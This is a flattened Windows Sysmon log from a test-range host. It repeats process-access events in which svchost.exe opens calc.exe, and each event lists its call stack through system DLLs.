22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360203Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360202Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360201Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360200Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360199Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360198Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360197Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360196Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360195Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360194Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360193Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360192Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360191Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360190Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360189Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360188Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360187Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360186Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360185Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360184Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360183Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360182Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 